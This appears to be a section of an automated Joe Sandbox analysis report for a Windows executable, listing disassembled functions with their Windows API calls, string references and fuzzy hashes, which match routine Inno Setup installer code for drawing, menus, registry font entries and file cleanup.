                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressErrorHandleLastLoadModuleProcType
                                                              • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                              • API String ID: 1914119943-2711329623
                                                              • Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                              • Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
                                                              • Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                              • Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
                                                              APIs
                                                              • RectVisible.GDI32(?,?), ref: 00416E13
                                                              • SaveDC.GDI32(?), ref: 00416E27
                                                              • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                              • RestoreDC.GDI32(?,?), ref: 00416E65
                                                              • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                              • FrameRect.USER32(?,?,?), ref: 00416F18
                                                              • DeleteObject.GDI32(?), ref: 00416F22
                                                              • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                              • FrameRect.USER32(?,?,?), ref: 00416F65
                                                              • DeleteObject.GDI32(?), ref: 00416F6F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                              • String ID:
                                                              • API String ID: 375863564-0
                                                              • Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                              • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                              • Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                              • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                              • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                              • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                              • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                              • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                              • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                              • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                              • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                              Similarity
                                                              • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                              • String ID:
                                                              • API String ID: 1694776339-0
                                                              • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                              • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                              • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                              • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                              APIs
                                                              • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                              • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                              • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                              • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                              • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                              • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                              • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                              • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                              • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                              • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                              Similarity
                                                              • API ID: Menu$Delete$EnableItem$System
                                                              • String ID:
                                                              • API String ID: 3985193851-0
                                                              • Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                              • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                              • Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                              • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                              APIs
                                                              • FreeLibrary.KERNEL32(10000000), ref: 00481A11
                                                              • FreeLibrary.KERNEL32(02370000), ref: 00481A25
                                                              • SendNotifyMessageA.USER32(00010452,00000496,00002710,00000000), ref: 00481A97
                                                              Strings
                                                              • Deinitializing Setup., xrefs: 00481872
                                                              • GetCustomSetupExitCode, xrefs: 004818B1
                                                              • Restarting Windows., xrefs: 00481A72
                                                              • DeinitializeSetup, xrefs: 0048190D
                                                              • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
                                                              Similarity
                                                              • API ID: FreeLibrary$MessageNotifySend
                                                              • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                              • API String ID: 3817813901-1884538726
                                                              • Opcode ID: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                              • Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
                                                              • Opcode Fuzzy Hash: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                              • Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
                                                              APIs
                                                              • SHGetMalloc.SHELL32(?), ref: 004616C7
                                                              • GetActiveWindow.USER32 ref: 0046172B
                                                              • CoInitialize.OLE32(00000000), ref: 0046173F
                                                              • SHBrowseForFolder.SHELL32(?), ref: 00461756
                                                              • CoUninitialize.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
                                                              • SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
                                                              • SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
                                                              Similarity
                                                              • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                              • String ID: A
                                                              • API String ID: 2684663990-3554254475
                                                              • Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                              • Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
                                                              • Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                              • Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
                                                                • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                              • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
                                                              • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
                                                              Similarity
                                                              • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                              • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                              • API String ID: 884541143-1710247218
                                                              • Opcode ID: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                              • Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
                                                              • Opcode Fuzzy Hash: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                              • Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
                                                              APIs
                                                              • GetProcAddress.KERNEL32(02370000,inflateInit_), ref: 0045D2BD
                                                              • GetProcAddress.KERNEL32(02370000,inflate), ref: 0045D2CD
                                                              • GetProcAddress.KERNEL32(02370000,inflateEnd), ref: 0045D2DD
                                                              • GetProcAddress.KERNEL32(02370000,inflateReset), ref: 0045D2ED
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                              • API String ID: 190572456-3516654456
                                                              • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                              • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                              • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                              • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
                                                              APIs
                                                              • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                              • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                              • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                              • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                              Similarity
                                                              • API ID: Color$StretchText
                                                              • String ID:
                                                              • API String ID: 2984075790-0
                                                              • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                              • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                              • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                              • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                              APIs
                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                              • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                              Similarity
                                                              • API ID: CloseDirectoryHandleSystem
                                                              • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                              • API String ID: 2051275411-1862435767
                                                              • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                              • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                              • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                              • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
                                                              APIs
                                                              • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                              • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                              • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                              • GetSysColor.USER32(00000010), ref: 0044D202
                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                              Similarity
                                                              • API ID: Text$Color$Draw$OffsetRect
                                                              • String ID:
                                                              • API String ID: 1005981011-0
                                                              • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                              • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                              • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                              • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                              APIs
                                                              • GetFocus.USER32 ref: 0041B745
                                                              • GetDC.USER32(?), ref: 0041B751
                                                              • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                              • RealizePalette.GDI32(00000000), ref: 0041B792
                                                              • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                              • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                              Similarity
                                                              • API ID: Palette$Select$BitmapCreateFocusRealize
                                                              • String ID: %H
                                                              • API String ID: 3275473261-1959103961
                                                              • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                              • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                              • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                              • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                              APIs
                                                              • GetFocus.USER32 ref: 0041BA17
                                                              • GetDC.USER32(?), ref: 0041BA23
                                                              • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                              • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                              • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                              • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                              Strings
                                                              Similarity
                                                              • API ID: Palette$Select$BitmapCreateFocusRealize
                                                              • String ID: %H
                                                              • API String ID: 3275473261-1959103961
                                                              • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                              • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                              • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                              • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                              APIs
                                                                • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                              • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                              • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                              • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                              • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                              Strings
                                                              • Deleting Uninstall data files., xrefs: 004964FB
                                                              Similarity
                                                              • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                              • String ID: Deleting Uninstall data files.
                                                              • API String ID: 1570157960-2568741658
                                                              • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                              • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                              • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                              • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                              • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                              • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                              • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                              Strings
                                                              • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                              • AddFontResource, xrefs: 004702B5
                                                              • Failed to open Fonts registry key., xrefs: 00470281
                                                              Similarity
                                                              • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                              • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                              • API String ID: 955540645-649663873
                                                              • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                              • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                              • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                              • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                              APIs
                                                                • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                              • GetVersion.KERNEL32 ref: 00462E60
                                                              • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                              • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                              • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                              • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                              Strings
                                                              Similarity
                                                              • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                              • String ID: Explorer
                                                              • API String ID: 2594429197-512347832
                                                              • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                              • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                              • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                              • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021E2BD0,?,?,?,021E2BD0,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021E2BD0,?,?,?,021E2BD0,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                              • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021E2BD0,?,?,?,021E2BD0), ref: 004783CC
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,021E2BD0,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                              Strings
                                                              Similarity
                                                              • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                              • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                              • API String ID: 2704155762-2318956294
                                                              • Opcode ID: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                              • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                              • Opcode Fuzzy Hash: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                              • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
                                                                • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                              Strings
                                                              • Failed to strip read-only attribute., xrefs: 00459EA0
                                                              • Failed to delete directory (%d)., xrefs: 00459F68
                                                              • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                              • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                              • Stripped read-only attribute., xrefs: 00459E94
                                                              • Deleting directory: %s, xrefs: 00459E5B
                                                              • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                              Similarity
                                                              • API ID: CloseErrorFindLast
                                                              • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                              • API String ID: 754982922-1448842058
                                                              • Opcode ID: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                              • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                              • Opcode Fuzzy Hash: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                              • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                              APIs
                                                              • GetCapture.USER32 ref: 00422EA4
                                                              • GetCapture.USER32 ref: 00422EB3
                                                              • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                              • ReleaseCapture.USER32 ref: 00422EBE
                                                              • GetActiveWindow.USER32 ref: 00422ECD
                                                              • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                              • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                              • GetActiveWindow.USER32 ref: 00422FBF
                                                              Similarity
                                                              • API ID: CaptureMessageSend$ActiveWindow$Release
                                                              • String ID:
                                                              • API String ID: 862346643-0
                                                              • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                              • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                              • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                              • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                              APIs
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                              • GetActiveWindow.USER32 ref: 0042F2DA
                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                              • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                              Similarity
                                                              • API ID: Window$ActiveLong$Message
                                                              • String ID:
                                                              • API String ID: 2785966331-0
                                                              • Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                              • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                              • Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                              • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0042948A
                                                              • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                              • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                              • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                              • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                              • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                              • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                              Similarity
                                                              • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                              • String ID:
                                                              • API String ID: 1583807278-0
                                                              • Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                              • Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
                                                              • Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                              • Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0041DE27
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                              • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                              • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                              • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                              • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                              • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                              Memory Dump Source
